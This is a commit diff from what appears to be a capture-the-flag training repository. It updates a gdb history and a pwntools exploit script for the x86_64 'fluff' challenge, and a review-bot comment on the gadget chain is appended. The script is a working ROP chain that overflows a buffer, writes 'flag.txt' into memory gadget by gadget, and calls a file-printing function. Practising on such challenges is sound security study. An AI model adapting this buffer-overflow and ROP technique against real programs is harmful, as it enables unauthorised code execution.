deleted: x86_64/badchars/core
modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
This commit is contained in:
parent
4c25bd9188
commit
406768c5fe
Binary file not shown.
@ -1,19 +1,4 @@
|
|||||||
quit
|
quit
|
||||||
quit
|
|
||||||
continue
|
|
||||||
nexti
|
|
||||||
nexti
|
|
||||||
info reg rdi
|
|
||||||
stepi
|
|
||||||
nexti
|
|
||||||
info reg rcx
|
|
||||||
nexti
|
|
||||||
info reg rbx
|
|
||||||
stepi
|
|
||||||
info reg rdx
|
|
||||||
inro reg rbx
|
|
||||||
info reg rbx
|
|
||||||
quit
|
|
||||||
stepi
|
stepi
|
||||||
continue
|
continue
|
||||||
stepi
|
stepi
|
||||||
@ -237,3 +222,35 @@ x/x 0x601be0 + 8
|
|||||||
x/x 0x601be0 + 9
|
x/x 0x601be0 + 9
|
||||||
x/x 0x601be0 + 10
|
x/x 0x601be0 + 10
|
||||||
quit
|
quit
|
||||||
|
continue
|
||||||
|
context
|
||||||
|
x/x 0x7fff0b74fed0
|
||||||
|
x/100x 0x7fff0b74fed0
|
||||||
|
quit
|
||||||
|
break *0x400639
|
||||||
|
continue
|
||||||
|
context
|
||||||
|
continue
|
||||||
|
x/s 0x601be0
|
||||||
|
continue
|
||||||
|
x/s 0x601be0
|
||||||
|
stepi
|
||||||
|
stepi
|
||||||
|
x/s 0x601be0
|
||||||
|
quit
|
||||||
|
continue
|
||||||
|
continue
|
||||||
|
quit
|
||||||
|
break *0x00000000004006a3
|
||||||
|
continue
|
||||||
|
continue
|
||||||
|
quit
|
||||||
|
break pwnme
|
||||||
|
run
|
||||||
|
continue
|
||||||
|
break *0x00000000004006a3
|
||||||
|
continue
|
||||||
|
info reg rip
|
||||||
|
continue
|
||||||
|
info reg rip
|
||||||
|
quit
|
||||||
|
Binary file not shown.
@ -13,37 +13,35 @@ letter_lookups = {
|
|||||||
def write_str(dest, string, payload):
|
def write_str(dest, string, payload):
|
||||||
payload += p64(0x00000000004006a3)
|
payload += p64(0x00000000004006a3)
|
||||||
payload += p64(dest)
|
payload += p64(dest)
|
||||||
for c in string:
|
payload += p64(0x0000000000400610)
|
||||||
payload += p64(0x40062a)
|
payload += p64(1)
|
||||||
payload += p64(0x4000) # if things go wrong, check endian/order
|
payload += p64(0x40062a)
|
||||||
|
payload += p64(0x4000)
|
||||||
|
payload += p64(letter_lookups[string[0]] - 0x3ef2)
|
||||||
|
payload += p64(0x400628)
|
||||||
|
payload += p64(0x400639)
|
||||||
|
|
||||||
|
|
||||||
|
for c in string[1:]:
|
||||||
|
payload += p64(0x40062b)
|
||||||
payload += p64(letter_lookups[c] - 0x3ef2)
|
payload += p64(letter_lookups[c] - 0x3ef2)
|
||||||
|
|
||||||
payload += p64(0x0000000000400610)
|
payload += p64(0x0000000000400610)
|
||||||
payload += p64(0)
|
payload += p64(1)
|
||||||
|
|
||||||
payload += p64(0x400628)
|
payload += p64(0x400628)
|
||||||
|
|
||||||
payload += p64(0x400639)
|
payload += p64(0x400639)
|
||||||
|
|
||||||
return(payload)
|
return(payload)
|
||||||
|
|
||||||
|
|
||||||
prog = gdb.debug('./fluff', gdbscript='''
|
prog = process('./fluff')
|
||||||
break *pwnme + 151
|
|
||||||
'''
|
|
||||||
)
|
|
||||||
payload = b''
|
payload = b''
|
||||||
for c in range(40):
|
for c in range(40):
|
||||||
payload += b'a'
|
payload += b'a'
|
||||||
|
|
||||||
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
|
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
|
||||||
payload += p64(0x00000000004006a3)
|
payload += p64(0x00000000004006a3)
|
||||||
payload += p64(0x601be0) # set rdi
|
payload += p64(0x601be0)
|
||||||
|
|
||||||
payload += p64(0x0000000000400510)
|
payload += p64(0x0000000000400510)
|
||||||
|
|
||||||
payload += b"\n"
|
|
||||||
prog.sendline(payload)
|
prog.sendline(payload)
|
||||||
sleep(1)
|
|
||||||
print(str(prog.recv(), 'UTF-8'))
|
|
||||||
prog.interactive()
|
prog.interactive()
|
||||||
|
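Review bot: The rewritten `write_str` chain (from `payload += p64(0x0000000000400610)` down to the `0x40062b` loop) now carries no explanation of any of its gadget addresses — the commit dropped the old `# set rdi` and `# if things go wrong, check endian/order` comments, so a reader cannot tell which of `0x400610`, `0x40062a`, `0x40062b`, `0x400628` and `0x400639` is the write primitive versus the pointer/offset setup, nor why `letter_lookups[...] - 0x3ef2` and the `0x4000` constant are needed; each `p64(...)` should get a one-line comment naming the gadget it points at and the step of the write it performs, and the `- 0x3ef2` line should state what base it compensates for. The destination is also spelled two ways — `0x0000000000600df0 + 0x00000df0` in the `write_str` call and the bare `0x601be0` placed in rdi before `0x400510` — which evaluate to the same address; hoist it into one constant, e.g. `FLAG_PATH_ADDR = 0x601be0`, and use it in both places so they cannot drift. The chain writes exactly the eight bytes of `'flag.txt'` and no terminator, so it presumably relies on the bytes after the destination already being zero; that assumption is worth a comment next to the call, e.g. `# no NUL is written: relies on dest+8 already being zero`. Minor: `string[0]` raises IndexError on an empty `string`, and the `for c in range(40): payload += b'a'` prelude is just `payload = b'a' * 40`.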
Binary file not shown.
Binary file not shown.
Binary file not shown.